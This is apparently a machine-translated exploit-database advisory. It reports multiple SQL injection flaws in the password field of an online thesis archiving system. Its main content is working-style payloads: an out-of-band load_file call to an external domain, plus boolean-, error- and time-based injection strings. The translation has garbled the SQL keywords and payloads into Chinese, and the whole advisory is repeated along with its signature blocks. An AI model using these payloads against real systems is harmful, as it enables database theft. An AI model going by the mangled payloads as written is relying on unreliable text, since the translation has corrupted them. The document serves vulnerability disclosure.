##利用title:在线论文归档系统v1.0-多sqli
##作者: nu11secur1ty
## date: 06.12.2023
## vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/...tem-using-phpoop-free-source-source-code.html
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
密码参数似乎很容易受到SQL注入的影响
攻击。有效载荷'+(选择
load_file('\\\\\ t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj99.tupungerispanspanspanski.com \\ ock')+')+')+'')
在密码参数中提交。
此有效载荷注入一个调用MySQL load_file的SQL子问题
使用UNC文件路径的功能,该路径在外部引用URL
领域。该应用程序与该域相互作用,表明
注射的SQL查询已执行。攻击者可以倾倒全部
来自
该系统的数据库,然后他可以将其用于危险和
恶意目的!
状态:高临界脆弱性
[+]有效载荷:
``MySQL
---
参数:密码(帖子)
Type:基于布尔的盲人
title:或基于布尔的盲人- 在哪里或有子句(不)
payload: email=[email protected]=v7k!u1n!t7)
还是不是1404=1404- eotr
type:基于错误的
title: mysql=5.0和基于错误的- 在哪里,订购,订购或
小组划分(地板)
payload: email=[email protected]=v7k!u1n!t7)
和(从(选择Count(*),Concat(0x717a6b6b71),(选择)(选择)
(ELT(5476=5476,1))),0x71766a7a71,地板(rand(0)*2))x
信息_schema.plugins组由x)a) - soua
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload: email=[email protected]=v7k!u1n!t7)
(从(select(sleep(15)))MFGI中选择6301-hcqy
---
````````
##复制:
[HREF](https://github.com/nu11secur1ty/cve...n/main/vendors/oretnom23/2023/2023/otas-v1.0)
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)
##时间花费:
01:15:00
- -
系统管理员- 基础设施工程师
穿透测试工程师
www.exploit-db.com
0day exploit数据库https://0day.today/
主页page: https://www.nu11secur1ty.com/
hipenimr0v7qco/+seh9gbclaaywgnpobiq75scj60e=
nu11secur1ty http://nu11secur1ty.com/
- -
系统管理员- 基础设施工程师
穿透测试工程师
0day exploit数据库https://0day.today/
主页page: https://www.nu11secur1ty.com/
hipenimr0v7qco/+seh9gbclaaywgnpobiq75scj60e=
nu11secur1ty http://nu11secur1ty.com/
##作者: nu11secur1ty
## date: 06.12.2023
## vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/...tem-using-phpoop-free-source-source-code.html
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
密码参数似乎很容易受到SQL注入的影响
攻击。有效载荷'+(选择
load_file('\\\\\ t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj99.tupungerispanspanspanski.com \\ ock')+')+')+'')
在密码参数中提交。
此有效载荷注入一个调用MySQL load_file的SQL子问题
使用UNC文件路径的功能,该路径在外部引用URL
领域。该应用程序与该域相互作用,表明
注射的SQL查询已执行。攻击者可以倾倒全部
来自
该系统的数据库,然后他可以将其用于危险和
恶意目的!
状态:高临界脆弱性
[+]有效载荷:
``MySQL
---
参数:密码(帖子)
Type:基于布尔的盲人
title:或基于布尔的盲人- 在哪里或有子句(不)
payload: email=[email protected]=v7k!u1n!t7)
还是不是1404=1404- eotr
type:基于错误的
title: mysql=5.0和基于错误的- 在哪里,订购,订购或
小组划分(地板)
payload: email=[email protected]=v7k!u1n!t7)
和(从(选择Count(*),Concat(0x717a6b6b71),(选择)(选择)
(ELT(5476=5476,1))),0x71766a7a71,地板(rand(0)*2))x
信息_schema.plugins组由x)a) - soua
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload: email=[email protected]=v7k!u1n!t7)
(从(select(sleep(15)))MFGI中选择6301-hcqy
---
````````
##复制:
[HREF](https://github.com/nu11secur1ty/cve...n/main/vendors/oretnom23/2023/2023/otas-v1.0)
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)
##时间花费:
01:15:00
- -
系统管理员- 基础设施工程师
穿透测试工程师
正在加载...
packetstormscurity.com
正在加载...
cve.mitre.org
OffSec’s Exploit Database Archive
The Exploit Database - Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more.
主页page: https://www.nu11secur1ty.com/
hipenimr0v7qco/+seh9gbclaaywgnpobiq75scj60e=
nu11secur1ty http://nu11secur1ty.com/
- -
系统管理员- 基础设施工程师
穿透测试工程师
正在加载...
packetstormscurity.com
正在加载...
cve.mitre.org
正在加载...
cxsecurity.com
主页page: https://www.nu11secur1ty.com/
hipenimr0v7qco/+seh9gbclaaywgnpobiq75scj60e=
nu11secur1ty http://nu11secur1ty.com/